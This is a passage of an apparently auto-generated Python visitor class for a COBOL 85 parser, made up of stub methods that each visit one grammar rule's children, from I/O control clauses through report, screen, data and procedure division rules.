return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ioControlParagraph.
def visitIoControlParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ioControlClause.
def visitIoControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunClause.
def visitRerunClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunEveryRecords.
def visitRerunEveryRecords(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunEveryOf.
def visitRerunEveryOf(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunEveryClock.
def visitRerunEveryClock(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sameClause.
def visitSameClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multipleFileClause.
def visitMultipleFileClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multipleFilePosition.
def visitMultipleFilePosition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#commitmentControlClause.
def visitCommitmentControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDivision.
def visitDataDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDivisionSection.
def visitDataDivisionSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileSection.
def visitFileSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileDescriptionEntry.
def visitFileDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileDescriptionEntryClause.
def visitFileDescriptionEntryClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#externalClause.
def visitExternalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#globalClause.
def visitGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#blockContainsClause.
def visitBlockContainsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#blockContainsTo.
def visitBlockContainsTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClause.
def visitRecordContainsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClauseFormat1.
def visitRecordContainsClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClauseFormat2.
def visitRecordContainsClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClauseFormat3.
def visitRecordContainsClauseFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsTo.
def visitRecordContainsTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#labelRecordsClause.
def visitLabelRecordsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#valueOfClause.
def visitValueOfClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#valuePair.
def visitValuePair(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRecordsClause.
def visitDataRecordsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageClause.
def visitLinageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageAt.
def visitLinageAt(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageFootingAt.
def visitLinageFootingAt(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageLinesAtTop.
def visitLinageLinesAtTop(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageLinesAtBottom.
def visitLinageLinesAtBottom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordingModeClause.
def visitRecordingModeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#modeStatement.
def visitModeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#codeSetClause.
def visitCodeSetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportClause.
def visitReportClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataBaseSection.
def visitDataBaseSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataBaseSectionEntry.
def visitDataBaseSectionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#workingStorageSection.
def visitWorkingStorageSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linkageSection.
def visitLinkageSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationSection.
def visitCommunicationSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntry.
def visitCommunicationDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntryFormat1.
def visitCommunicationDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntryFormat2.
def visitCommunicationDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntryFormat3.
def visitCommunicationDescriptionEntryFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#destinationCountClause.
def visitDestinationCountClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#destinationTableClause.
def visitDestinationTableClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#endKeyClause.
def visitEndKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#errorKeyClause.
def visitErrorKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#messageCountClause.
def visitMessageCountClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#messageDateClause.
def visitMessageDateClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#messageTimeClause.
def visitMessageTimeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#statusKeyClause.
def visitStatusKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicDestinationClause.
def visitSymbolicDestinationClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicQueueClause.
def visitSymbolicQueueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicSourceClause.
def visitSymbolicSourceClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicTerminalClause.
def visitSymbolicTerminalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicSubQueueClause.
def visitSymbolicSubQueueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#textLengthClause.
def visitTextLengthClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#localStorageSection.
def visitLocalStorageSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenSection.
def visitScreenSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionEntry.
def visitScreenDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBlankClause.
def visitScreenDescriptionBlankClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBellClause.
def visitScreenDescriptionBellClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBlinkClause.
def visitScreenDescriptionBlinkClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionEraseClause.
def visitScreenDescriptionEraseClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionLightClause.
def visitScreenDescriptionLightClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionGridClause.
def visitScreenDescriptionGridClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionReverseVideoClause.
def visitScreenDescriptionReverseVideoClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionUnderlineClause.
def visitScreenDescriptionUnderlineClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionSizeClause.
def visitScreenDescriptionSizeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionLineClause.
def visitScreenDescriptionLineClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionColumnClause.
def visitScreenDescriptionColumnClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionForegroundColorClause.
def visitScreenDescriptionForegroundColorClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBackgroundColorClause.
def visitScreenDescriptionBackgroundColorClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionControlClause.
def visitScreenDescriptionControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionValueClause.
def visitScreenDescriptionValueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionPictureClause.
def visitScreenDescriptionPictureClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionFromClause.
def visitScreenDescriptionFromClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionToClause.
def visitScreenDescriptionToClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionUsingClause.
def visitScreenDescriptionUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionUsageClause.
def visitScreenDescriptionUsageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBlankWhenZeroClause.
def visitScreenDescriptionBlankWhenZeroClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionJustifiedClause.
def visitScreenDescriptionJustifiedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionSignClause.
def visitScreenDescriptionSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionAutoClause.
def visitScreenDescriptionAutoClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionSecureClause.
def visitScreenDescriptionSecureClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionRequiredClause.
def visitScreenDescriptionRequiredClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionPromptClause.
def visitScreenDescriptionPromptClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionPromptOccursClause.
def visitScreenDescriptionPromptOccursClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionFullClause.
def visitScreenDescriptionFullClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionZeroFillClause.
def visitScreenDescriptionZeroFillClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportSection.
def visitReportSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescription.
def visitReportDescription(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionEntry.
def visitReportDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionGlobalClause.
def visitReportDescriptionGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionPageLimitClause.
def visitReportDescriptionPageLimitClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionHeadingClause.
def visitReportDescriptionHeadingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionFirstDetailClause.
def visitReportDescriptionFirstDetailClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionLastDetailClause.
def visitReportDescriptionLastDetailClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionFootingClause.
def visitReportDescriptionFootingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntry.
def visitReportGroupDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntryFormat1.
def visitReportGroupDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntryFormat2.
def visitReportGroupDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntryFormat3.
def visitReportGroupDescriptionEntryFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupBlankWhenZeroClause.
def visitReportGroupBlankWhenZeroClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupColumnNumberClause.
def visitReportGroupColumnNumberClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupIndicateClause.
def visitReportGroupIndicateClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupJustifiedClause.
def visitReportGroupJustifiedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupLineNumberClause.
def visitReportGroupLineNumberClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupLineNumberNextPage.
def visitReportGroupLineNumberNextPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupLineNumberPlus.
def visitReportGroupLineNumberPlus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupNextGroupClause.
def visitReportGroupNextGroupClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupNextGroupPlus.
def visitReportGroupNextGroupPlus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupNextGroupNextPage.
def visitReportGroupNextGroupNextPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupPictureClause.
def visitReportGroupPictureClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupResetClause.
def visitReportGroupResetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupSignClause.
def visitReportGroupSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupSourceClause.
def visitReportGroupSourceClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupSumClause.
def visitReportGroupSumClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeClause.
def visitReportGroupTypeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeReportHeading.
def visitReportGroupTypeReportHeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypePageHeading.
def visitReportGroupTypePageHeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeControlHeading.
def visitReportGroupTypeControlHeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeDetail.
def visitReportGroupTypeDetail(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeControlFooting.
def visitReportGroupTypeControlFooting(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupUsageClause.
def visitReportGroupUsageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypePageFooting.
def visitReportGroupTypePageFooting(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeReportFooting.
def visitReportGroupTypeReportFooting(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupValueClause.
def visitReportGroupValueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programLibrarySection.
def visitProgramLibrarySection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryDescriptionEntry.
def visitLibraryDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryDescriptionEntryFormat1.
def visitLibraryDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryDescriptionEntryFormat2.
def visitLibraryDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeClauseFormat1.
def visitLibraryAttributeClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeClauseFormat2.
def visitLibraryAttributeClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeFunction.
def visitLibraryAttributeFunction(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeParameter.
def visitLibraryAttributeParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeTitle.
def visitLibraryAttributeTitle(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureClauseFormat1.
def visitLibraryEntryProcedureClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureClauseFormat2.
def visitLibraryEntryProcedureClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureForClause.
def visitLibraryEntryProcedureForClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureGivingClause.
def visitLibraryEntryProcedureGivingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureUsingClause.
def visitLibraryEntryProcedureUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureUsingName.
def visitLibraryEntryProcedureUsingName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureWithClause.
def visitLibraryEntryProcedureWithClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureWithName.
def visitLibraryEntryProcedureWithName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryIsCommonClause.
def visitLibraryIsCommonClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryIsGlobalClause.
def visitLibraryIsGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntry.
def visitDataDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryFormat1.
def visitDataDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryFormat2.
def visitDataDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryFormat3.
def visitDataDescriptionEntryFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryExecSql.
def visitDataDescriptionEntryExecSql(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataAlignedClause.
def visitDataAlignedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataBlankWhenZeroClause.
def visitDataBlankWhenZeroClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataCommonOwnLocalClause.
def visitDataCommonOwnLocalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataExternalClause.
def visitDataExternalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataGlobalClause.
def visitDataGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataIntegerStringClause.
def visitDataIntegerStringClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataJustifiedClause.
def visitDataJustifiedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataOccursClause.
def visitDataOccursClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataOccursTo.
def visitDataOccursTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataOccursSort.
def visitDataOccursSort(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataPictureClause.
def visitDataPictureClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#pictureString.
def visitPictureString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#pictureChars.
def visitPictureChars(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#pictureCardinality.
def visitPictureCardinality(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataReceivedByClause.
def visitDataReceivedByClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRecordAreaClause.
def visitDataRecordAreaClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRedefinesClause.
def visitDataRedefinesClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRenamesClause.
def visitDataRenamesClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataSignClause.
def visitDataSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataSynchronizedClause.
def visitDataSynchronizedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataThreadLocalClause.
def visitDataThreadLocalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataTypeClause.
def visitDataTypeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataTypeDefClause.
def visitDataTypeDefClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataUsageClause.
def visitDataUsageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataUsingClause.
def visitDataUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueClause.
def visitDataValueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueInterval.
def visitDataValueInterval(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueIntervalFrom.
def visitDataValueIntervalFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueIntervalTo.
def visitDataValueIntervalTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataWithLowerBoundsClause.
def visitDataWithLowerBoundsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivision.
def visitProcedureDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionUsingClause.
def visitProcedureDivisionUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionGivingClause.
def visitProcedureDivisionGivingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionUsingParameter.
def visitProcedureDivisionUsingParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByReferencePhrase.
def visitProcedureDivisionByReferencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByReference.
def visitProcedureDivisionByReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByValuePhrase.
def visitProcedureDivisionByValuePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByValue.
def visitProcedureDivisionByValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDeclaratives.
def visitProcedureDeclaratives(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDeclarative.
def visitProcedureDeclarative(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureSectionHeader.
def visitProcedureSectionHeader(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionBody.
def visitProcedureDivisionBody(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureSection.
def visitProcedureSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paragraphs.
def visitParagraphs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paragraph.
def visitParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sentence.
def visitSentence(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptStatement.
def visitAcceptStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptFromDateStatement.
def visitAcceptFromDateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptFromMnemonicStatement.
def visitAcceptFromMnemonicStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptFromEscapeKeyStatement.
def visitAcceptFromEscapeKeyStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptMessageCountStatement.
def visitAcceptMessageCountStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addStatement.
def visitAddStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addToStatement.
def visitAddToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addToGivingStatement.
def visitAddToGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addCorrespondingStatement.
def visitAddCorrespondingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addFrom.
def visitAddFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addTo.
def visitAddTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addToGiving.
def visitAddToGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addGiving.
def visitAddGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alteredGoTo.
def visitAlteredGoTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alterStatement.
def visitAlterStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alterProceedTo.
def visitAlterProceedTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callStatement.
def visitCallStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callUsingPhrase.
def visitCallUsingPhrase(self, ctx):
